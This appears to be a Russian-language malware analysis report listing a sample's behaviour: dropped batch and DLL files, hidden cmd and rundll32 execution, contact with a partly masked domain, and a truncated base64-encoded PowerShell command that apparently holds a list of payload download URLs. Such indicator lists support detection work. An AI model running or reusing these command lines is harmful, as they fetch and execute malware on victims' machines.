Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\1347250943.dll
- %ALLUSERSPROFILE%\1347250943.dll в %LOCALAPPDATA%\hwukietegwxs\pmyhmxgilsw.wfe
- 'th####ndskill.com':443
- DNS ASK th####ndskill.com
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAdAByAGUAbgBkAHMAawBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUASAAxADEALwAsAGgAdAB0AHAAOgAvAC8AYQBsAGkAdAB0AGwAZQBiAHIAYQB2AGUALgBj...
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\1347250943.dll,f2053649999
- '%WINDIR%\syswow64\rundll32.exe' "%ALLUSERSPROFILE%\1347250943.dll",DllRegisterServer
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Hwukietegwxs\pmyhmxgilsw.wfe",xvvBuNbBQbPSOV
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Hwukietegwxs\pmyhmxgilsw.wfe",DllRegisterServer